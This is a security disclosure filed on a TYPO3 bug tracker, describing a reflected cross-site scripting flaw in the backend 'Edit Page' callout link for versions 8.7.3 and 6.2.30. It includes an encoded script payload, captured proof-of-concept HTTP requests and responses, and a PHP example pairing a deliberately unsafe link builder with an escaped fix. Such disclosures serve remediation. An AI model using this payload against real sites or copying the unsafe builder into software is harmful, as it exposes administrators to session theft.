Bug #82077
XSS in page module (status: closed)
Description
For the attention of the TYPO3 security team,
I would like to inform you about a security issue that I have found in the CMS TYPO3 (checked on versions 8.7.3 and 6.2.30).
Specifically, these versions of TYPO3 are vulnerable to a reflected Cross-Site Scripting in the "Edit Page" area of the Backend administrative console, for pages which are configured to show the content of other pages.
Technical Details
=================
The scenario to reproduce the security issue is described below.
Prerequisite - Configure a page to show content from another page: on the home screen of the Backend administrative console select "Page" from the left panel, then select a site page in the tree view on the side and go to "Edit Page". Then select the "Appearance" tab and click the "Page" button in the "Replace Content" section in order to add any content to that page, and finally save it.
At this point, in the "Edit Page" area for the aforementioned page, a blue rectangle will appear containing a link with the label "Page uses content from ...", and this link is affected by the reflected XSS issue.
Proof of Concept:
To replicate the issue it is sufficient to click the aforementioned new link (for 8.7.3 it has the format: "/typo3/index.php?M=web_layout&moduleToken=<TOKEN-VALUE>&id=<ID-VALUE>").
Then grab the GET request being sent to the server and add the payload to the URL query; the submitted payload is reflected in the corresponding response body.
EXAMPLE (a screenshot of the PoC is attached)
Payload: &xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E
ORIGINAL REQUEST:
--------------------------------
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2 HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 12 Jul 2017 07:20:31 GMT
PoC REQUEST:
------------
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2&xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
PoC RESPONSE:
-------------
HTTP/1.1 200 OK
Date: Wed, 12 Jul 2017 08:15:06 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Wed, 12 Jul 2017 08:15:06 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41399
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
[...]
<div class="callout callout-info"><div class="media"><div class="media-left"><span class="fa-stack fa-lg callout-icon"><i class="fa fa-circle fa-stack-2x"></i><i class="fa fa-info fa-stack-1x"></i></span></div><div class="media-body"><h4 class="callout-title">page1</h4><div class="callout-body">
Page uses content from this page: <a href="/typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=1&xss"><script>alert('xss')</script>=">page1 (PID 1)</a>
</div></div></div></div>
[...]
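The following PHP is an added example, not TYPO3's own code: it models the callout link builder in the two forms the PoC response above implies, an unsafe variant that re-serialises the request parameters verbatim into the href (which yields the "<key>=" reflection visible in the response), and a hardened variant that encodes for the URL context and then escapes for the HTML attribute context. The function names, the $params array and the token value are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not TYPO3's own code. In the PoC response the injected
// parameter comes back as "<key>=" inside the href, so the link builder is
// modelled here as re-serialising the request parameters. Function names,
// $params and the token value are assumptions.

// Unsafe variant: keys and values are joined verbatim and dropped into an
// HTML attribute. A key such as  xss"><script>...  is neither URL-encoded
// nor HTML-escaped, so " closes the href attribute and > closes the tag;
// the rest of the key lands in the page as live markup.
function buildCalloutLinkUnsafe(array $params, int $sourcePid, string $label): string
{
    $params['id'] = $sourcePid;          // link targets the page whose content is used
    $pairs = [];
    foreach ($params as $key => $value) {
        $pairs[] = $key . '=' . $value;  // no encoding for either context
    }
    $href = '/typo3/index.php?' . implode('&', $pairs);
    return '<a href="' . $href . '">' . $label . '</a>';
}

// Hardened variant: encode once for each context the data passes through.
// 1. http_build_query() percent-encodes keys and values for the URL context.
// 2. htmlspecialchars() with ENT_QUOTES escapes the result for the attribute
//    context, so neither " nor < can terminate the attribute or the tag.
function buildCalloutLinkSafe(array $params, int $sourcePid, string $label): string
{
    $params['id'] = $sourcePid;
    $href  = '/typo3/index.php?' . http_build_query($params);
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<a href="' . htmlspecialchars($href, $flags, 'UTF-8') . '">'
         . htmlspecialchars($label, $flags, 'UTF-8') . '</a>';
}

// Constructed input: roughly what $_GET holds for the PoC request once PHP
// has URL-decoded it. The payload arrives as a key with an empty value;
// the moduleToken is a placeholder, not a real token.
$params = [
    'M'           => 'web_layout',
    'moduleToken' => 'TOKEN-PLACEHOLDER',
    'id'          => '2',
    'xss"><script>alert(\'xss\')</script>' => '',
];

// The first line reproduces the reflection seen in the PoC response; the
// second keeps the same parameters but as inert, escaped attribute text.
echo "Unsafe: ", buildCalloutLinkUnsafe($params, 1, 'page1 (PID 1)'), PHP_EOL;
echo "Safe:   ", buildCalloutLinkSafe($params, 1, 'page1 (PID 1)'), PHP_EOL;
```

In the hardened output the payload survives only as percent-encoded text inside the attribute value, so the browser treats it as part of the URL rather than as markup.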
Vulnerable Versions:
TYPO3 8.7.3 and earlier
Checked on:
TYPO3/8.7.3
TYPO3/6.2.30 (for the 6.2.x versions the affected link is "/typo3/sysext/cms/layout/db_layout.php?id=1&clear_cache=1")